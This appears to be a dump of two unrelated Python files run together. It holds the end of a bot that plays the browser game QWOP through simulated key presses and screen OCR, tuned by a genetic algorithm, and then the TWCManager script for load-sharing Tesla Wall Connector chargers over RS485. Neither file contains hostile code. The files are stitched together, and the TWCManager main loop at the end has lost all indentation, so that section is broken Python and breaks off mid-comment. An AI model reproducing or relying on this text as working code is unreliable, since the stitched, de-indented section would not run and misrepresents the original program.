metres_start_x, metres_start_y = 170, 24
metres_end_x, metres_end_y = 413, 50
metres_box = (metres_start_x, metres_start_y, metres_end_x, metres_end_y)
# x, y coordinate of the ribbon that pops up when you die
ribbon_x, ribbon_y = 155, 125
ribbon_pixel = (ribbon_x, ribbon_y)
# QWOP codes
# Each genome letter A-P encodes which keys are held, as (Q, W, O, P) flags.
QWOP_CODE = {
    'P': (False, False, False, False),
    'D': (False, False, False, True),
    'C': (False, False, True, False),
    'J': (False, False, True, True),
    'B': (False, True, False, False),
    'I': (False, True, False, True),
    'H': (False, True, True, False),
    'N': (False, True, True, True),
    'A': (True, False, False, False),
    'G': (True, False, False, True),
    'F': (True, False, True, False),
    'M': (True, False, True, True),
    'E': (True, True, False, False),
    'L': (True, True, False, True),
    'K': (True, True, True, False),
    'O': (True, True, True, True),
    None: (False, False, False, False)
}
# Key codes
# Windows virtual-key codes for the keys the bot presses.
VK_CODE = {
    'SPACE':0x20,
    'O':0x4F,
    'P':0x50,
    'Q':0x51,
    'W':0x57
}
def sendKey(key, duration=0.1, up=True):
    """Press virtual key `key` for `duration` seconds; release unless up=False."""
    win32api.keybd_event(key, 0, 0, 0)
    time.sleep(duration)
    if not up:
        # Caller wants the key left held down.
        return
    win32api.keybd_event(key, 0, win32con.KEYEVENTF_KEYUP, 0)
def leftClick(coords, duration=0.1, up=True):
    """Left-click at game-relative `coords`, holding the button for `duration`."""
    screen_x = start_x + coords[0]
    screen_y = start_y + coords[1]
    win32api.SetCursorPos((screen_x, screen_y))
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)
    time.sleep(duration)
    if not up:
        # Caller wants the button left held down.
        return
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)
def sendKeys(keys):
    """
    Send a list of (key, duration, up) triples concurrently.
    """
    workers = [
        threading.Thread(target=sendKey, args=(VK_CODE[key], duration, up))
        for (key, duration, up) in keys
    ]
    # Create every thread before starting any, so the presses begin as
    # close to simultaneously as possible.
    for worker in workers:
        worker.start()
def sendQwopCode(key, next=None):
    """
    Send a QWOP-encoded key to the game.

    `key` is a letter from QWOP_CODE encoding which of Q/W/O/P are held for
    this frame. `next` is kept for call-site compatibility but is unused
    (the original unpacked QWOP_CODE[next] into dead locals; that has been
    removed).
    """
    (q, w, o, p) = QWOP_CODE[key]
    # Build the list of keys to hold for this frame.
    keys = []
    for pressed, name in zip((q, w, o, p), ('Q', 'W', 'O', 'P')):
        if pressed:
            keys.append((name, 0.15, True))
    # Send the keys
    sendKeys(keys)
    # wait for them to finish before moving on to the next one
    time.sleep(0.15)
def getRandomQwopString(numChars=5):
    """Return a random genome of `numChars` letters in the range A-P."""
    return "".join(chr(randint(65, 80)) for _ in xrange(numChars))
class AutoQwopper:
    """Screen-scraping driver for one QWOP game session.

    Grabs the game region of the screen, OCRs the distance readout with
    pytesser, and detects death via the colour of the end-of-run ribbon pixel.
    Coordinates assume the game sits at the fixed position given by `frame`.
    """
    def __init__(self):
        self.update()

    def getMetres(self):
        # OCR the distance dialog; [:-9] strips the trailing " metres\n" text
        # and spaces are removed before parsing the float.
        # NOTE(review): a misread by the OCR raises ValueError here -- confirm
        # how often that happens in practice.
        metres = float(image_to_string(self.metres_frame)[:-9].replace(' ', ''))
        self.metres = metres

    def update(self):
        # Re-grab the game frame and the cropped distance dialog, then re-OCR.
        self.qwop_frame = ImageGrab.grab(frame)
        self.metres_frame = self.qwop_frame.crop(metres_box)
        self.getMetres()

    def die(self):
        # Holding Q then W for 1.5s each makes the runner fall, ending the run.
        print('Killing qwopper.')
        sendKey(VK_CODE['Q'], duration=1.5)
        sendKey(VK_CODE['W'], duration=1.5)

    def isDead(self):
        # The end-of-run ribbon renders pure yellow at this pixel.
        return (self.qwop_frame.getpixel(ribbon_pixel) == (255, 255, 0))

    def beginGame(self):
        # Click inside the game area to give it focus / start the run.
        leftClick((100, 100))

    def restartGame(self):
        sendKey(VK_CODE['SPACE'])

    def run(self, qwopString):
        """Replay `qwopString` until death or a 60s budget; return metres run."""
        self.beginGame()
        if (self.isDead()):
            # restart game if this isn't the first time playing
            self.restartGame()
        self.update()
        self.getMetres()
        print ("Evaluating qwop string: " + "".join(qwopString))
        start = time.time()
        running = True
        while running:
            # Pair each code with its successor (None for the last one).
            for qwopCode, next in zip(qwopString, qwopString[1:] + [None]):
                sendQwopCode(qwopCode, next)
                self.update()
                if (self.isDead()):
                    running = False
                    # Set fitness to 0 if crashed
                    # self.metres = 0
                    print("Qwopper died")
                    break
                if (time.time() - start > 60):
                    running = False
                    print("Time exceeded")
                    # Do one final update
                    time.sleep(0.5)
                    self.update()
                    break
        if (not self.isDead()):
            self.die()
        print ("Went a total of " + str(self.metres) + " metres before dying.")
        time.sleep(2)
        return self.metres
# The main GA
def evaluate(ind):
    """Fitness function: play one game with genome `ind`; metres run as a 1-tuple."""
    runner = AutoQwopper()
    distance = runner.run(ind)
    return (distance,)
def generateGene():
    """Return one random gene: a letter between 'A' (65) and 'P' (80)."""
    code = randint(65, 80)
    return chr(code)
def mutate(ind):
    """Mutate `ind` in place: re-randomize one randomly chosen position.

    Mutation as described in Google's paper. Returns the same list object.
    Empty individuals are returned unchanged (randint(0, -1) would raise
    ValueError in the original).
    """
    if ind:
        ind[randint(0, len(ind) - 1)] = chr(randint(65, 80))
    return ind
toolbox = base.Toolbox()
# Single-objective fitness: maximize metres run.
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness = creator.FitnessMax)
# An individual is IND_SIZE random genes (letters A-P).
toolbox.register("individual", tools.initRepeat, creator.Individual, generateGene, n=IND_SIZE)
toolbox.register("select", tools.selTournament, k=2, tournsize=T_SIZE)
toolbox.register("onePoint", tools.cxOnePoint)
toolbox.register("twoPoint", tools.cxTwoPoint)
toolbox.register("selectBest", tools.selBest, k=selb)
toolbox.register("selectWorst", tools.selWorst, k=selw)
# GENERATE STATISTICS
stats = tools.Statistics(key=lambda ind: ind.fitness.values)
hallOfFame = tools.HallOfFame(1)
logbook = tools.Logbook()
stats.register('max', max)
stats.register('min', min)
stats.register('mean', numpy.mean)
def updateStatistics(population, generation):
    """Record per-generation stats and persist the logbook to LB_FILE.

    The file is rewritten in place each generation: without the
    seek/truncate, successive pickle.dump calls on the same open handle
    append one pickle per generation, and a single pickle.load of
    logbook.pickle would only ever return the oldest logbook.
    """
    hallOfFame.update(population)
    record = stats.compile(population)
    record['best'] = "".join(hallOfFame[0])
    record['generation'] = generation
    logbook.record(**record)
    LB_FILE.seek(0)
    LB_FILE.truncate()
    pickle.dump(logbook, LB_FILE)
    LB_FILE.flush()
def main():
    """Run the steady-state GA: one child per generation, worst-replacement."""
    population = [toolbox.individual() for i in range(POP_SIZE)] #generate population
    for i in range(len(population)):
        #evaluate populations
        population[i].fitness.values = evaluate(population[i])
    for i in range(generations):
        updateStatistics(population, i)
        selected = toolbox.select(population) #select
        parent1 = toolbox.clone(selected[0])
        parent2 = toolbox.clone(selected[1])
        child = toolbox.onePoint(parent1, parent2)[0] #crossover
        child = mutate(child)
        child.fitness.values = evaluate(child) #evaluate child
        # NOTE(review): selectWorst returns selw (5) individuals but POP_SIZE
        # is 1, so this removes a random one of the worst -- confirm intended.
        population.remove(choice(toolbox.selectWorst(population))) #survivor select
        population.append(child) #replacement
def runOne(qwopString):
    """Play a single genotype once, without running the GA."""
    AutoQwopper().run(qwopString)
if __name__ == '__main__':
    # A command-line argument is replayed as a single genotype;
    # otherwise run the full genetic algorithm.
    if len(sys.argv) > 1:
        print ("Running a single genotype.")
        runOne(list(sys.argv[1]))
    else:
        main()
TWCManager.py | #! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/ngardiner/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
import importlib
import logging
import os.path
import math
import re
import sys
import time
import traceback
import datetime
import yaml
import threading
from TWCManager.TWCMaster import TWCMaster
import requests
from enum import Enum
logging.addLevelName(19, "INFO2")
logging.addLevelName(18, "INFO4")
logging.addLevelName(17, "INFO4")
logging.addLevelName(16, "INFO5")
logging.addLevelName(15, "INFO6")
logging.addLevelName(14, "INFO7")
logging.addLevelName(13, "INFO8")
logging.addLevelName(12, "INFO9")
logging.addLevelName(9, "DEBUG2")
logging.INFO2 = 19
logging.INFO3 = 18
logging.INFO4 = 17
logging.INFO5 = 16
logging.INFO6 = 15
logging.INFO7 = 14
logging.INFO8 = 13
logging.INFO9 = 12
logging.DEBUG2 = 9
logger = logging.getLogger("\u26FD Manager")
# Define available modules for the instantiator
# All listed modules will be loaded at boot time
# Logging modules should be the first one to load
modules_available = [
    "Logging.ConsoleLogging",
    "Logging.FileLogging",
    "Logging.SentryLogging",
    "Logging.CSVLogging",
    "Logging.MySQLLogging",
    "Logging.SQLiteLogging",
    "Protocol.TWCProtocol",
    "Interface.Dummy",
    "Interface.RS485",
    "Interface.TCP",
    "Policy.Policy",
    "Vehicle.TeslaAPI",
    "Vehicle.TeslaMateVehicle",
    "Control.WebIPCControl",
    "Control.HTTPControl",
    "Control.MQTTControl",
    # "Control.OCPPControl",
    "EMS.Efergy",
    "EMS.EmonCMS",
    "EMS.Enphase",
    "EMS.Fronius",
    "EMS.Growatt",
    "EMS.HASS",
    "EMS.IotaWatt",
    "EMS.Kostal",
    "EMS.OpenHab",
    "EMS.OpenWeatherMap",
    "EMS.P1Monitor",
    "EMS.SmartMe",
    "EMS.SmartPi",
    "EMS.SolarEdge",
    "EMS.SolarLog",
    "EMS.TeslaPowerwall2",
    "EMS.TED",
    "EMS.Volkszahler",
    "EMS.URL",
    "Status.HASSStatus",
    "Status.MQTTStatus",
]
# Enable support for Python Visual Studio Debugger
# When DEBUG_SECRET is set, attach ptvsd and block until a debugger connects.
if "DEBUG_SECRET" in os.environ:
    import ptvsd

    ptvsd.enable_attach(os.environ["DEBUG_SECRET"])
    ptvsd.wait_for_attach()
##########################
# Load Configuration File
config = None
jsonconfig = None
if os.path.isfile("/etc/twcmanager/config.json"):
    jsonconfig = open("/etc/twcmanager/config.json")
else:
    if os.path.isfile("config.json"):
        jsonconfig = open("config.json")

if jsonconfig:
    configtext = ""
    for line in jsonconfig:
        # Strip whole-line // and # comments; drop trailing # comments and
        # tabs so the JSON-with-comments file parses via the YAML loader.
        if line.lstrip().startswith("//") or line.lstrip().startswith("#"):
            configtext += "\n"
        else:
            configtext += line.replace("\t", " ").split("#")[0]
    jsonconfig.close()  # fix: release the file handle once fully read
    config = yaml.safe_load(configtext)
    configtext = None
else:
    logger.error("Unable to find a configuration file.")
    sys.exit()

logLevel = config["config"].get("logLevel")
if logLevel is None:
    # Fall back to the legacy 0-11 debugLevel scale, mapped onto the custom
    # log levels registered above.
    debugLevel = config["config"].get("debugLevel", 1)
    debug_to_log = {
        0: 40,
        1: 20,
        2: 19,
        3: 18,
        4: 17,
        5: 16,
        6: 15,
        7: 14,
        8: 13,
        9: 12,
        10: 10,
        11: 9,
    }
    for debug, log in debug_to_log.items():
        if debug >= debugLevel:
            logLevel = log
            break

logging.getLogger().setLevel(logLevel)
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 65535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b"\x77\x77")
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def hex_str(data):
    """Return *data* as space-separated uppercase two-digit hex byte values.

    Accepts either a str (each character's ordinal is formatted) or a
    bytes/bytearray. The original file defined hex_str twice -- once for str
    and once for bytearray -- so the str variant was silently shadowed; this
    single implementation dispatches on the argument type instead.
    """
    if isinstance(data, str):
        return " ".join("{:02X}".format(ord(c)) for c in data)
    return " ".join("{:02X}".format(b) for b in data)
def time_now():
    """Current wall-clock time as HH:MM:SS, with microseconds if configured."""
    fmt = "%H:%M:%S"
    if config["config"]["displayMilliseconds"]:
        fmt += ".%f"
    return datetime.datetime.now().strftime(fmt)
def unescape_msg(inmsg: bytearray, msgLen):
    """Strip framing and unescape an RS485 message.

    Removes the leading and trailing C0 framing bytes and reverses the
    SLIP-style escaping used on the wire (DB DC -> C0, DB DD -> DB).
    Returns a new bytearray; `inmsg` is never modified.

    NOTE(review): despite the original header comment, no CRC verification
    is actually performed here.
    """
    # Note that a bytearray is mutable, whereas a bytes object isn't.
    # By initializing a bytearray and concatenating the incoming bytearray
    # to it, we protect against being passed an immutable bytes object
    msg = bytearray() + inmsg[0:msgLen]

    # See notes in RS485.send() for the way certain bytes in messages are escaped.
    # We basically want to change db dc into c0 and db dd into db.
    # Only scan to one less than the length of the string to avoid running off
    # the end looking at i+1.
    i = 0
    # Bug fix: the loop previously ran while i < len(msg), so a (corrupt)
    # message whose final byte was 0xDB raised IndexError on msg[i + 1].
    while i < len(msg) - 1:
        if msg[i] == 0xDB:
            if msg[i + 1] == 0xDC:
                # Replace characters at msg[i] and msg[i+1] with 0xc0,
                # shortening the string by one character. In Python, msg[x:y]
                # refers to a substring starting at x and ending immediately
                # before y. y - x is the length of the substring.
                msg[i : i + 2] = [0xC0]
            elif msg[i + 1] == 0xDD:
                msg[i : i + 2] = [0xDB]
            else:
                logger.info(
                    "ERROR: Special character 0xDB in message is "
                    "followed by invalid character 0x%02X. "
                    "Message may be corrupted." % (msg[i + 1])
                )
                # Replace the character with something even though it's probably
                # not the right thing.
                msg[i : i + 2] = [0xDB]
        i = i + 1

    # Remove leading and trailing C0 byte.
    msg = msg[1 : len(msg) - 1]
    return msg
def background_tasks_thread(master):
    """Worker loop: pull queued background tasks from `master` and dispatch.

    Each task is a dict with a "cmd" key; most commands delegate to the
    TeslaAPI vehicle module or back to `master`. Exceptions are logged and
    the loop continues, so a single bad task cannot kill the thread.
    """
    carapi = master.getModuleByName("TeslaAPI")

    while True:
        try:
            task = master.getBackgroundTask()

            if "cmd" in task:
                if task["cmd"] == "applyChargeLimit":
                    carapi.applyChargeLimit(limit=task["limit"])
                elif task["cmd"] == "charge":
                    # car_api_charge does nothing if it's been under 60 secs since it
                    # was last used so we shouldn't have to worry about calling this
                    # too frequently.
                    carapi.car_api_charge(task["charge"])
                elif task["cmd"] == "carApiEmailPassword":
                    carapi.resetCarApiLastErrorTime()
                    carapi.car_api_available(task["email"], task["password"])
                elif task["cmd"] == "checkArrival":
                    # Re-apply the last charge limit; 0 means "none recorded",
                    # which is passed through as -1 (no limit).
                    limit = (
                        carapi.lastChargeLimitApplied
                        if carapi.lastChargeLimitApplied != 0
                        else -1
                    )
                    carapi.applyChargeLimit(limit=limit, checkArrival=True)
                elif task["cmd"] == "checkCharge":
                    carapi.updateChargeAtHome()
                elif task["cmd"] == "checkDeparture":
                    carapi.applyChargeLimit(
                        limit=carapi.lastChargeLimitApplied, checkDeparture=True
                    )
                elif task["cmd"] == "checkGreenEnergy":
                    check_green_energy()
                elif task["cmd"] == "checkVINEntitlement":
                    # The two possible arguments are task["subTWC"] which tells us
                    # which TWC to check, or task["vin"] which tells us which VIN
                    if task.get("vin", None):
                        task["subTWC"] = master.getTWCbyVIN(task["vin"])
                    if task["subTWC"]:
                        if master.checkVINEntitlement(task["subTWC"]):
                            logger.info(
                                "Vehicle %s on TWC %02X%02X is permitted to charge."
                                % (
                                    task["subTWC"].currentVIN,
                                    task["subTWC"].TWCID[0],
                                    task["subTWC"].TWCID[1],
                                )
                            )
                        else:
                            logger.info(
                                "Vehicle %s on TWC %02X%02X is not permitted to charge. Terminating session."
                                % (
                                    task["subTWC"].currentVIN,
                                    task["subTWC"].TWCID[0],
                                    task["subTWC"].TWCID[1],
                                )
                            )
                            master.sendStopCommand(task["subTWC"].TWCID)
                elif task["cmd"] == "getLifetimekWh":
                    master.getSlaveLifetimekWh()
                elif task["cmd"] == "getVehicleVIN":
                    master.getVehicleVIN(task["slaveTWC"], task["vinPart"])
                elif task["cmd"] == "snapHistoryData":
                    master.snapHistoryData()
                elif task["cmd"] == "updateStatus":
                    update_statuses()
                elif task["cmd"] == "webhook":
                    # Fire a GET or POST webhook depending on configuration;
                    # POST carries the full master status as JSON.
                    if config["config"].get("webhookMethod", "POST") == "GET":
                        requests.get(task["url"])
                    else:
                        body = master.getStatus()
                        requests.post(task["url"], json=body)
                elif task["cmd"] == "saveSettings":
                    master.saveSettings()
                elif task["cmd"] == "sunrise":
                    update_sunrise_sunset()
        except:
            logger.info(
                "%s: "
                + traceback.format_exc()
                + ", occurred when processing background task",
                "BackgroundError",
                extra={"colored": "red"},
            )
            pass

        # task_done() must be called to let the queue know the task is finished.
        # backgroundTasksQueue.join() can then be used to block until all tasks
        # in the queue are done.
        master.doneBackgroundTask(task)
def check_green_energy():
    """Poll every EMS module for generation/consumption figures and, when the
    active policy is a green-energy policy, update the max amps available to
    divide among the slave TWCs."""
    global config, hass, master
    # Check solar panel generation using an API exposed by
    # the HomeAssistant API.
    #
    # You may need to customize the sensor entity_id values
    # to match those used in your environment. This is configured
    # in the config section at the top of this file.
    #
    # Poll all loaded EMS modules for consumption and generation values
    for module in master.getModulesByType("EMS"):
        master.setConsumption(module["name"], module["ref"].getConsumption())
        master.setGeneration(module["name"], module["ref"].getGeneration())
    # Set max amps iff charge_amps isn't specified on the policy.
    if master.getModuleByName("Policy").policyIsGreen():
        master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy())
def update_statuses():
    """Log the current charging limit and push min/max amp values to every
    Status module. When a green-energy policy is active, also log the
    generation/consumption breakdown."""
    # Print a status update if we are on track green energy showing the
    # generation and consumption figures
    maxamps = master.getMaxAmpsToDivideAmongSlaves()
    maxampsDisplay = f"{maxamps:.2f}A"
    if master.getModuleByName("Policy").policyIsGreen():
        genwatts = master.getGeneration()
        conwatts = master.getConsumption()
        conoffset = master.getConsumptionOffset()
        chgwatts = master.getChargerLoad()
        othwatts = 0
        # "Other" load is whatever consumption isn't the chargers themselves.
        if config["config"]["subtractChargerLoad"]:
            if conwatts > 0:
                othwatts = conwatts - chgwatts
            if conoffset > 0:
                othwatts -= conoffset
        # Extra parameters to send with logs
        logExtra = {
            "logtype": "green_energy",
            "genWatts": genwatts,
            "conWatts": conwatts,
            "chgWatts": chgwatts,
            "colored": "magenta",
        }
        # Four log variants depending on which figures are non-zero.
        if (genwatts or conwatts) and (not conoffset and not othwatts):
            logger.info(
                "Green energy Generates %s, Consumption %s (Charger Load %s)",
                f"{genwatts:.0f}W",
                f"{conwatts:.0f}W",
                f"{chgwatts:.0f}W",
                extra=logExtra,
            )
        elif (genwatts or conwatts) and othwatts and not conoffset:
            logger.info(
                "Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s)",
                f"{genwatts:.0f}W",
                f"{conwatts:.0f}W",
                f"{chgwatts:.0f}W",
                f"{othwatts:.0f}W",
                extra=logExtra,
            )
        elif (genwatts or conwatts) and othwatts and conoffset > 0:
            logger.info(
                "Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s, Offset %s)",
                f"{genwatts:.0f}W",
                f"{conwatts:.0f}W",
                f"{chgwatts:.0f}W",
                f"{othwatts:.0f}W",
                f"{conoffset:.0f}W",
                extra=logExtra,
            )
        elif (genwatts or conwatts) and othwatts and conoffset < 0:
            logger.info(
                "Green energy Generates %s (Offset %s), Consumption %s (Charger Load %s, Other Load %s)",
                f"{genwatts:.0f}W",
                f"{(-1 * conoffset):.0f}W",
                f"{conwatts:.0f}W",
                f"{chgwatts:.0f}W",
                f"{othwatts:.0f}W",
                extra=logExtra,
            )
        # What we would nominally offer based purely on the power figures.
        nominalOffer = master.convertWattsToAmps(
            genwatts
            + (
                chgwatts
                if (config["config"]["subtractChargerLoad"] and conwatts == 0)
                else 0
            )
            - (
                conwatts
                - (
                    chgwatts
                    if (config["config"]["subtractChargerLoad"] and conwatts > 0)
                    else 0
                )
            )
        )
        if abs(maxamps - nominalOffer) > 0.005:
            nominalOfferDisplay = f"{nominalOffer:.2f}A"
            logger.debug(
                f"Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw"
            )
            conwatts = genwatts - master.convertAmpsToWatts(maxamps)
        generation = f"{master.convertWattsToAmps(genwatts):.2f}A"
        consumption = f"{master.convertWattsToAmps(conwatts):.2f}A"
        logger.info(
            "Limiting charging to %s - %s = %s.",
            generation,
            consumption,
            maxampsDisplay,
            extra={"colored": "magenta"},
        )
    else:
        # For all other modes, simply show the Amps to charge at
        logger.info(
            "Limiting charging to %s.", maxampsDisplay, extra={"colored": "magenta"}
        )
    # Print minimum charge for all charging policies
    minchg = f"{config['config']['minAmpsPerTWC']}A"
    logger.info(
        "Charge when above %s (minAmpsPerTWC).", minchg, extra={"colored": "magenta"}
    )
    # Update Sensors with min/max amp values
    for module in master.getModulesByType("Status"):
        module["ref"].setStatus(
            bytes("config", "UTF-8"),
            "min_amps_per_twc",
            "minAmpsPerTWC",
            config["config"]["minAmpsPerTWC"],
            "A",
        )
        module["ref"].setStatus(
            bytes("all", "UTF-8"),
            "max_amps_for_slaves",
            "maxAmpsForSlaves",
            master.getMaxAmpsToDivideAmongSlaves(),
            "A",
        )
def update_sunrise_sunset():
    """Refresh master.settings["sunrise"]/["sunset"] as local whole hours.

    Queries the free sunrise-sunset.org API when a home lat/long is known,
    rounding each timestamp to the nearest hour.  Falls back to 6 (sunrise)
    and 20 (sunset) when home is unknown or the lookup fails, then re-queues
    itself to run again at 01:00 tomorrow.

    Runs on the background-tasks thread; must never raise or hang.
    """
    ltNow = time.localtime()
    latlong = master.getHomeLatLon()
    # Defaults used when home is unknown or the API is unreachable.
    sunrise = 6
    sunset = 20
    # getHomeLatLon() reports 10000 as "we don't know where home is".
    if latlong[0] != 10000:
        url = (
            "https://api.sunrise-sunset.org/json?lat="
            + str(latlong[0])
            + "&lng="
            + str(latlong[1])
            + "&formatted=0&date="
            + "-".join([str(ltNow.tm_year), str(ltNow.tm_mon), str(ltNow.tm_mday)])
        )
        results = {}
        try:
            # timeout keeps a dead network from hanging the background thread
            # forever; "or {}" guards against a body with no "results" key,
            # which previously caused an AttributeError on None below.
            results = requests.get(url, timeout=30).json().get("results") or {}
        except (requests.exceptions.RequestException, ValueError):
            # Network failure or invalid JSON: keep the defaults.
            pass
        if results.get("sunrise", None):
            try:
                # API returns ISO-8601 with a UTC offset (formatted=0);
                # astimezone() with no tz argument converts to local time.
                dtSunrise = datetime.datetime.astimezone(
                    datetime.datetime.fromisoformat(results["sunrise"])
                )
                # Round to the nearest whole hour.
                sunrise = dtSunrise.hour + (1 if dtSunrise.minute >= 30 else 0)
            except (ValueError, TypeError):
                pass
        if results.get("sunset", None):
            try:
                dtSunset = datetime.datetime.astimezone(
                    datetime.datetime.fromisoformat(results["sunset"])
                )
                sunset = dtSunset.hour + (1 if dtSunset.minute >= 30 else 0)
            except (ValueError, TypeError):
                pass
    master.settings["sunrise"] = sunrise
    master.settings["sunset"] = sunset
    # Schedule the next refresh for 01:00 tomorrow (delay given in seconds).
    tomorrow = datetime.datetime.combine(
        datetime.datetime.today(), datetime.time(hour=1)
    ) + datetime.timedelta(days=1)
    diff = tomorrow - datetime.datetime.now()
    master.queue_background_task({"cmd": "sunrise"}, diff.total_seconds())
#
# End functions
#
##############################
##############################
#
# Begin global vars
#
# State shared by the main RS-485 receive loop below.
data = ""  # most recent byte(s) read from the interface module
dataLen = 0  # buffer length reported by the interface module
ignoredData = bytearray()  # noise bytes seen between messages (logged with next Rx)
msg = bytearray()  # message currently being assembled from the wire
msgLen = 0  # bytes accumulated in msg so far (0 = between messages)
numInitMsgsToSend = 10  # >5: send linkready1; 1-5: linkready2; 0: heartbeats
msgRxCount = 0  # count of complete messages received
idxSlaveToSendNextHeartbeat = 0  # round-robin index into the known-slave list
timeLastkWhDelivered = time.time()  # last time delivered kWh was accumulated
timeLastkWhSaved = time.time()  # last time settings were persisted (every 300s)
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ""  # web-interface IPC state; presumably used by WebIPCControl — not visible here
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0  # fake-slave mode: when to report state 0A, 44s after state 06
timeToRaise2A = 0  # fake-slave mode: when to raise amps by 2A, 10s after state 07
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
# Instantiate necessary classes
# Instantiate necessary classes
master = TWCMaster(fakeTWCID, config)

# Instantiate all modules in the modules_available list automatically.
# Entries look like "Type.ClassName" (e.g. "Status.SomeStatusModule").
for module in modules_available:
    modulename = []
    if str(module).find(".") != -1:
        modulename = str(module).split(".")

    try:
        # Pre-emptively skip modules that we know are not configured
        configlocation = master.translateModuleNameToConfig(modulename)
        if (
            not config.get(configlocation[0], {})
            .get(configlocation[1], {})
            .get("enabled", 1)
        ):
            # We can see that this module is explicitly disabled in config, skip it
            continue

        moduleref = importlib.import_module("TWCManager." + module)
        modclassref = getattr(moduleref, modulename[1])
        modinstance = modclassref(master)

        # Register the new module with master class, so every other module can
        # interact with it
        master.registerModule(
            {"name": modulename[1], "ref": modinstance, "type": modulename[0]}
        )
    except ModuleNotFoundError as e:
        # NOTE: ModuleNotFoundError is a subclass of ImportError, so this
        # handler must come FIRST.  In the original order it was unreachable
        # and a missing optional dependency was logged as an error rather
        # than this informational message.
        logger.info(
            "%s: " + str(e) + ", when importing %s, not using %s",
            "ModuleNotFoundError",
            module,
            module,
            extra={"colored": "red"},
        )
    except ImportError as e:
        logger.error(
            "%s: " + str(e) + ", when importing %s, not using %s",
            "ImportError",
            module,
            module,
            extra={"colored": "red"},
        )
    # Any other exception propagates unchanged (the original's bare
    # "except: raise" was a no-op and has been dropped).
# Load settings from file
master.loadSettings()

# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,))
# Daemon thread: killed automatically when the main program exits, so no
# explicit stop/join protocol is needed on shutdown.
backgroundTasksThread.daemon = True
backgroundTasksThread.start()

# Queue the first sunrise/sunset lookup 30 seconds after startup;
# update_sunrise_sunset re-queues itself daily thereafter.
master.queue_background_task({"cmd": "sunrise"}, 30)

# Announce which role we will emulate on the RS-485 bus.
logger.info(
    "TWC Manager starting as fake %s with id %02X%02X and sign %02X"
    % (
        ("Master" if config["config"]["fakeMaster"] else "Slave"),
        ord(fakeTWCID[0:1]),
        ord(fakeTWCID[1:2]),
        ord(master.getSlaveSign()),
    )
)
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if config["config"]["fakeMaster"] == 1:
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if numInitMsgsToSend > 5:
master.send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif numInitMsgsToSend > 0:
master.send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if time.time() - master.getTimeLastTx() >= 1.0:
# It's been about a second since our last heartbeat.
if master.countSlaveTWC() > 0:
slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat)
if time.time() - slaveTWC.timeLastRx > 26:
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
logger.info(
"WARNING: We haven't heard from slave "
"%02X%02X for over 26 seconds. "
"Stop sending them heartbeat messages."
% (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
)
master.deleteSlaveTWC(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC():
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
